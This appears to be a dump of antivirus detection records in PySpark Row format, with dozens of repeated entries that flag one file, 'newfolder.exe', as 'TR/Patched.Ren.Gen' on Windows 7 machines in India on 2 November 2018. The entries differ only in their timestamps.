  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:01:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:20:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:13Z'), dt=datetime.date(2018, 11, 2)),
